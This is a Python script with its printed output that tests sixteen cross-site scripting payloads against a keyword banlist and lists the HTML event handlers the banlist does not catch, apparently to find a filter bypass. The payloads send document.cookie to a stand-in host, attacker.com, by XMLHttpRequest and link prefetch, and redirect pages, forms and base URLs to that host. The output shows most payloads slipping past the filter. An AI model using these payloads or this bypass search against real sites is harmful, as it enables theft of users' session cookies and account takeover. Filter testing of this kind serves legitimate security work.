banlist = ["`", "'", "concat", "alert", "fetch", "replace", "[","]", "javascript", "@", "!", "%", "img", "iframe", "math", "div", "svg", "location", "href", "window", "open", "eval", "onerror", "onload", "onclick", "onanimationstart", "javascript:", "onpageshow"] # Test payloads payloads = [ '<script>new XMLHttpRequest().open("GET","<http://attacker.com?c=>"+document.cookie).send()</script>', '<script>document.body.innerHTML=document.cookie</script>', '<script>new XMLHttpRequest()</script>', '<script>document.cookie</script>', '<link rel=prefetch href=http://attacker.com?c=+document.cookie>', '<meta http-equiv=refresh content=0;url=http://attacker.com>', '<base href=http://attacker.com>', '<object data=http://attacker.com></object>', '<embed src=http://attacker.com>', '<form action=http://attacker.com><input name=cookie></form>', '<video><source src=x type=video/mp4 ontimeupdate=document.body.innerHTML=document.cookie></video>', '<audio><source src=x type=audio/mpeg ondurationchange=document.body.innerHTML=document.cookie></audio>', '<details open ontoggle=document.body.innerHTML=document.cookie>', '<marquee onstart=document.body.innerHTML=document.cookie>', '<select onfocus=document.body.innerHTML=document.cookie autofocus>', '<input onfocus=document.body.innerHTML=document.cookie autofocus>', ] print("Testing payloads against banlist...\\n") for i, payload in enumerate(payloads, 1): payload_lower = payload.lower() blocked = [banned for banned in banlist if banned in payload_lower] if blocked: print(f"❌ Payload {i}: BLOCKED") print(f" Triggers: {blocked}") else: print(f"✅ Payload {i}: PASSES") print(f" {payload[:80]}...") print() print("\\n" + "="*80) print("Looking for bypasses...\\n") # Find event handlers not in banlist all_events = [ "onabort", "onafterprint", "onbeforeprint", "onbeforeunload", "onblur", "oncanplay", "oncanplaythrough", "onchange", "ondurationchange", "onemptied", "onended", "onfocus", "onformdata", "onhashchange", "oninput", "oninvalid", "onkeydown", "onkeypress", "onkeyup", "onlanguagechange", "onloadeddata", "onloadedmetadata", "onloadstart", "onmessage", "onmousedown", "onmouseenter", "onmouseleave", "onmousemove", "onmouseout", "onmouseover", "onmouseup", "onoffline", "ononline", "onpagehide", "onpause", "onplay", "onplaying", "onpopstate", "onprogress", "onratechange", "onreset", "onresize", "onscroll", "onsearch", "onseeked", "onseeking", "onselect", "onshow", "onstalled", "onstorage", "onsubmit", "onsuspend", "ontimeupdate", "ontoggle", "onunload", "onvolumechange", "onwaiting", "onwheel", "onstart" ] print("Event handlers NOT in banlist:") for event in all_events: if event not in banlist: print(f" ✅ {event}")
❌ Payload 1: BLOCKED Triggers: ['open'] <script>new XMLHttpRequest().open("GET","http://attacker.com?c="+document.cookie...
✅ Payload 2: PASSES <script>document.body.innerHTML=document.cookie</script>...
✅ Payload 3: PASSES <script>new XMLHttpRequest()</script>...
✅ Payload 4: PASSES <script>document.cookie</script>...
❌ Payload 5: BLOCKED Triggers: ['fetch', 'href'] <link rel=prefetch href=http://attacker.com?c=+document.cookie>...
✅ Payload 6: PASSES <meta http-equiv=refresh content=0;url=http://attacker.com>...
❌ Payload 7: BLOCKED Triggers: ['href'] <base href=http://attacker.com>...
✅ Payload 8: PASSES <object data=http://attacker.com></object>...
✅ Payload 9: PASSES <embed src=http://attacker.com>...
✅ Payload 10: PASSES <form action=http://attacker.com><input name=cookie></form>...
✅ Payload 11: PASSES <video><source src=x type=video/mp4 ontimeupdate=document.body.innerHTML=documen...
✅ Payload 12: PASSES <audio><source src=x type=audio/mpeg ondurationchange=document.body.innerHTML=do...
❌ Payload 13: BLOCKED Triggers: ['open'] <details open ontoggle=document.body.innerHTML=document.cookie>...
✅ Payload 14: PASSES <marquee onstart=document.body.innerHTML=document.cookie>...
✅ Payload 15: PASSES <select onfocus=document.body.innerHTML=document.cookie autofocus>...
✅ Payload 16: PASSES <input onfocus=document.body.innerHTML=document.cookie autofocus>...